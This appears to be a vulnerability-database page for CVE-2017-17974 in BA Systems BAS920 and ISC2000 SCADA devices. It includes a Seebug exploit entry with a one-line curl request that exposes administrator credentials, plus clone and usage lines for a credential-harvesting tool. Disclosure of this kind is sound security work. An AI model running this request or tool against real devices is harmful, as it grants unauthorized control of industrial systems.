Vulnerabilities > CVE-2017-17974 - Unspecified vulnerability in Basystems Bas920 Firmware and Isc2000 Firmware

047910
CVSS 9.8 - CRITICAL
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
HIGH
Integrity impact
HIGH
Availability impact
HIGH
network
low complexity
basystems
critical
NVD
Published: 2017-12-29
Updated: 2024-11-21

Summary

BA SYSTEMS BAS Web on BAS920 devices (with Firmware 01.01.00*, HTTPserv 00002, and Script 02.*) and ISC2000 devices allows remote attackers to obtain sensitive information via a request for isc/get_sid_js.aspx or isc/get_sid.aspx, as demonstrated by obtaining administrative access by subsequently using the credential information for the Supervisor/Administrator account.

Vulnerable Configurations

Part Description Count
OS
Basystems
2
Hardware
Basystems
2

Seebug

bulletinFamilyexploit
description# Exploit; SCADAS "BAS920 & ISC2000"; Credentials Exposed ## [BA System] “Improper Access Control (Authorization)” [*] Exploit Title: "SCADAS "BAS920 & ISC2000"; Credentials Exposed” [*] CVE: CVE-2017-17974 [*] Date: 29/12/2017 [*] Exploit Author: Fernandez Ezequiel ( @capitan_alfa ) && Bertin Jose ( @bertinjoseb ) [*] Vendor: BA System [*] devices(tested): BAS920 & ISC2000 Atacando SCADAS de la firma “BA SYSTEM”: ![](https://images.seebug.org/1525932495921-w331s) Accedemos a la plataforma y como era de esperar nos recibe un "login form" ![](https://images.seebug.org/1525932504009-w331s) ### Exploit: ``` curl http://<host>/isc/get_sid_js.aspx ``` ### POCs: ![](https://images.seebug.org/1525932512672-w331s) ![](https://images.seebug.org/1525932520952-w331s) ### Adentro: ![](https://images.seebug.org/1525932529413-w331s) ![](https://images.seebug.org/1525932536499-w331s) *** # TOOL: "Plin Plan Plun" (ex - cafeina ) ## Quick start usr@pwn:~$ git clone https://github.com/ezelf/baCK_system.git usr@pwn:~$ cd baCK_system ## help usr@pwn:~/$ python plinplanplum.py --help python plinplanplum.py --help usage: plinplanplum.py [-h] [-v] --host HOST [--port PORT] [+] Obtaining all credentials for the Supervisor/Administrator account optional arguments: -h, --help show this help message and exit -v, --version show program's version number and exit --host HOST Host --port PORT Port [+] Demo: python plinplanplum.py --host 192.168.1.101 -p 81 *** ## Usage: ![](https://images.seebug.org/1525932585891-w331s) #### Last update !!! ![](https://images.seebug.org/1525932568749-w331s) ***
idSSV:97286
last seen2018-06-26
modified2018-05-10
published2018-05-10
reporterMy Seebug
sourcehttps://www.seebug.org/vuldb/ssvid-97286
titleSCADAS "BAS920 & ISC2000" Credentials Exposed(CVE-2017-17974)

References